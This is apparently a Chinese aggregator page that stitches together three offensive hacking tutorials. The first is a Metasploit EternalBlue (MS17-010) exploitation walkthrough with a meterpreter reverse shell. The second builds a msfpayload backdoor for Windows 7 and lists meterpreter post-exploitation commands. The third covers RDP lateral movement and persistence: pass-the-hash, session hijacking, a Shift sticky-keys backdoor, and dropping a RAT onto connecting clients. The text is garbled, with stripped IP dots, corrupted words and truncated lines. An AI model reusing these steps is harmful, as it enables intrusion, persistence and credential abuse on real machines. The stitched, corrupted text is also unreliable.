0x01 实验环境
攻击机:kali linux
ip:101010131
目标机:windows 2008 R2
ip:101010132
0x02 配置exploit
msf > use exploit/windows/smb/ms17_010_eternalblue
msf exploit(ms17_010_eternalblue) > set rhost 101010132
rhost => 101010132
查看选项
msf exploit(ms17_010_eternalblue) > show options
设置目标机的IP,其他选项默认就可以;
注意:选项中说明了此exploit对应的目标系统,所以并不是具有该漏洞的系统都能利用此exploit;
0x03 配置payload
payload只需要配置监听返回会话的IP;
msf exploit(ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf exploit(ms17_010_eternalblue) > set lhost 101010131
lhost => 101010131
0x04 开始攻击
警告:攻击过程可能导致目标系统宕机重启,谨慎 *** 作!
msf exploit(ms17_010_eternalblue) > exploit
成功获得session。
shell 进入主机 *** 作
很多朋友对使用Metasploit利用后门程序进行渗透windows7都比较感兴趣,针对这些以下业内相关专家就给大家介绍下,当下黑客怎么利用Metasploit进行渗透windows7的。设定目标主机为:cn_win7_x86_7601虚拟机,地址为:1921680116;而本地主机就为:1921680149。方法步骤一:黑客用Msfpayload直接生成相关的后门程序,如下图。sfpayloadwindows/meterpreter/reverse_tcpLHOST=1921680149x>steupexe方法步骤二:黑客直接就能进入所在的目录并将属性进行修改,换为允许以程序执行文件,详细如下图。进入所在目录,修改属性:选择“允许以程序执行文件”,这时候也可以做一些免杀方法步骤三:接着黑客就打开msfconsole并加载exploit/multi/handler模块并进行设置本地主机,最后就能开始进行监听了,详细情况如下图。打开msfconsole,加载exploit/multi/handler模块,设置本地主机;然后开始监听:exploit-z-j:方法步骤四:黑客需要能将程序直接拷贝都目标主机中并进行执行。方法步骤五:以上步骤全部完成后黑客就能通过后门程序反向连接到msf,用msf就能发起第2次的攻击然后使用客户端也就是后门程序就能连接都服务端msf,详细的如下图。Meterpreter就是metasploit框架中的一个扩展模块,因此的话溢出成功后黑客就能攻击载荷进行使用,一旦攻击载荷在溢出攻击成功后就能再返回一个控制通道,这样就能将它作为攻击载荷成功获得目标系统的一个meterpretershell的链接。另外,附meterpreter常用命令:getsystem#会自动利用各种各样的系统漏洞来进行权限提升migrate#进程id进程迁移background#把当前的会话设置为背景,需要的时候在启用getuid#查看对方正在运行的用户ps#列出所有的进程getpid#返回运行meterpreter的id号sysinfo#产看系统信息和体系结构shell#切换到cmd的系统权限方式exit#退出shell会话返回meterpreter或终止meterpretergetdesktop截取目标主机当前桌面会话窗口runwebcam-p/var/>
一、RDP 服务确定和启动
1 确定RDP服务是否启动和服务端口
(1)注册表查询
(2)进程查看
2 启动RDP服务
(1)cmd 本地注册表启动
也可以通过reg配置文件的方式启动:regedit /s startrdpreg
(2) 利用Wmic 启动远程主机的RDP服务
二、RDP 用户登录前
(1) 明文密码:RDP爆破,SMB爆破(使用MSF中的smb_login 模块可以确定有效用户并判断是否是管理员组的)等工具
(2) Hash:Impacket工具包中的rdp_checkpy 脚本可以通过hash确定目标机器是否存在枚举的用户
当用户存在时会提示 Access Granted,否者提示 Access Denied
(3) RDP中间人:Seth
执行后客户端链接服务器会失败,过段时间恢复正常
但是如果普通的用户,那需要进一步判断目标系统来确定合适的登录时机
(1) Windows XP、2003 支持统一用户登陆多地登陆互不影响,使用query user查看在线用户,XP没有该命令也可以使用taskmgr从任务管理器查看,同一权限下可以相互注 销会话。
(2) 非服务器版本的Windows 系统默认只允许一个账户登录。当远程用户登录时使用与原系统相同的账户,原系统将切换到登陆页面,并会看到登陆的机器名
如果使用不同的账户,原系统将d窗提示其他用户已登陆到此计算机
选择继续后,原系统将会提示是否端口当前链接(30s后默认选择同意,退出到登陆页面)
(1) mstscexe
可以通过如下命令开启 Restricted Admin mode
开启后使用:mstscexe /restrictedadmin 进行登录不需要密码,将使用当前用户的hash 进行验证
(2) mimikatzexe
4 Linux上使用用户hash登录
PS:这里有一个坑,高版本xfreerdp不支持 /pth 参数,可以使用上面的安装命令安装支持/pth的版本,也可以使用kali/parrot中默认安装好
PS2:如果RDP服务启动了,客户端无法链接,可能是防火墙配置的问题,可以执行如下命 令添加防火墙规则允许3389端口TCP通信
PS3:如果出现远程连接出现身份验证错误,要求的函数不支持,解决方法:
四、关于 RDP 权限维持方法
1 关闭 RDP 安全认证
当服务器开启安全认证时,必须先通过登陆密码才能进入远程桌面;如果服务端用的是 不安全的认证方式,即可以先远程链接后登陆可以触发Shift后门
如何设置不安全的连接,去掉”仅允许使用网络级别的身份验证的远程桌面的计算机连 接”选项,需要注意的是先上系统后验证也会在计算机本地留下一定的进程、日志。
2 Shift后门 + RDP劫持
配合上面的关闭RDP安全认证方式,利用Shift后门可以让攻击者快速获得System权 限,结合RDP劫持可以实现无需创建用户、不更改劫持用户登录时间、解锁劫持用户界面、 等功能。注意RDP劫持需要System权限
另外一种方法可以通过创建服务激活
Mimikatz中也有相关的利用模块
3 开启多人登录模式
(1)手动设置:将计算机配置(Computer Configuration)->管理模板 (Administrative Templates)->Windows组件(Windows Components)->远程桌面 服务(Remote Desktop Services)->远程桌面会话主机(Remote Desktop Session Host)->链接(Connections),禁用”将远程桌面服务的用户限制到单独的远程桌面会 话”(Restrict Remote Desktop Services users to a single Remote Desktop Services session) (2)Mimikatz 开启多用户登录,支持Win 7 及以前的版本系统
PS:使用与原系统相同的账户,原系统还是会被切换到登录界面;不同账户登陆成功 (3)RDPwrap:支持Win Vista - Win10
(4)SharpDoor:仅使用于Win 10 开启多会话RDP
五、RDP 服务器反打客户端
需要客户端RDP链接时,开启磁盘共享(将本地磁盘挂在到服务器上)才能正常利用
2 手动利用过程:假设客户端和登录服务器的用户都是Administrator
\Startup\powershellvbs 作用是无d窗执行bat脚本
(2)Windowsbat 脚本内容实现马(serviceexe)拷贝到客户端的启动目录
也可以根据实际情况,将Rat拷贝到客户端的其他目录,将激活脚本拷贝到客户端启动目 录;如果不出网的情况下,也可以将exe替换成要执行的脚本 。
以上就是关于ms17010漏洞利用msf | 2019-03-27 ms070-全部的内容,包括:ms17010漏洞利用msf | 2019-03-27 ms070-、如何利用metasploit进行漏洞扫描和攻击、横向渗透之 [RDP]等相关内容解答,如果想了解更多相关内容,可以关注我们,你们的支持是我们更新的动力!
欢迎分享,转载请注明来源:内存溢出
评论列表(0条)